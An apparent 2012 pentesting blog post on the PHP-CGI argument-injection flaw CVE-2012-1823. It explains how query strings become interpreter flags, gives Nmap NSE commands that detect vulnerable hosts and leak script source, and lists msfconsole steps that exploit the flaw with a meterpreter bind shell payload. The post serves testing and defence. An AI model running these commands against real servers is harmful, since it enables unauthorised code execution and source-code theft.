Detecting and exploiting vulnerable PHP-CGI applications
A critical vulnerability affecting PHP applications that run through the CGI interpreter (php-cgi) was published at the beginning of this month (http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/). When the query string contains no "=" character, php-cgi treats it as command-line arguments for the interpreter rather than as GET parameters: "?-s" makes it return the highlighted source code of the script, and "-d" lets an attacker set php.ini directives (such as allow_url_include and auto_prepend_file) that lead to remote code execution.
To detect vulnerable applications during a pentest, we can use the NSE script “http-cve2012-1823”:
$ nmap -p80 --script http-cve2012-1823 target
To leak the source code of a specific script instead of the default document, pass its path in the "uri" script argument:
$ nmap -p80 --script http-cve2012-1823 --script-args uri=/login.php target
Here you can watch a video demonstrating the detection of vulnerable PHP-CGI applications with this script.
This script was sent to Nmap's official repository with revision ID “28545” and should be available soon. In the meantime you can download it at:
The Metasploit project has contributed a module that exploits this vulnerability by injecting "-d" directives into php-cgi. To use it from msfconsole:
> use exploit/multi/http/php_cgi_arg_injection
> set RHOST IP
> set PAYLOAD php/meterpreter/bind_tcp
> exploit
Here you can watch a video demonstrating the exploitation of vulnerable PHP-CGI applications using the Metasploit Framework.